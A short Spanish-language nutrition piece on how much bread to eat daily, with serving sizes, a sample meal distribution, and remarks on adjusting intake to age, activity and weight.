¿Cuánto pan debería tomar?

En general podemos decir que, de 3 a 4 rebanadas finas constituyen una ración de pan, y al día podemos tomar entre 2 o 3 raciones siempre dependiendo de cómo es el resto de nuestra dieta. Un ejemplo orientativo podría ser el que sigue:

  • 2 tostadas o ½ bocadillo en el desayuno (si no se toman cereales)
  • ½ bocadillo a media mañana o a media tarde
  • 2 rebanadas en la comida
  • 2 rebanadas en la cena

Hay que tener en cuenta que la cantidad de pan que debemos comer siempre va en función de la edad de la persona, del nivel de actividad física, y de si existe, o no, un problema de sobrepeso. ¿Por qué? No es tanto por que el pan en sí mismo engorde mucho sino, como hemos dicho, por las calorías diarias totales que siempre se tienen que ajustar a las necesidades del individuo. No es lo mismo un adulto sedentario que un niño o adolescente deportista. Los hidratos de carbono que tiene el pan son «gasolina» para el cuerpo y necesitamos este combustible que se gastará sobre todo en las actividades físicas del día: caminar, subir escaleras, jugar en el patio del colegio, correr hasta el autobús o hacer deporte.

El pan es tradición y también tendencia. ¡Que aproveche!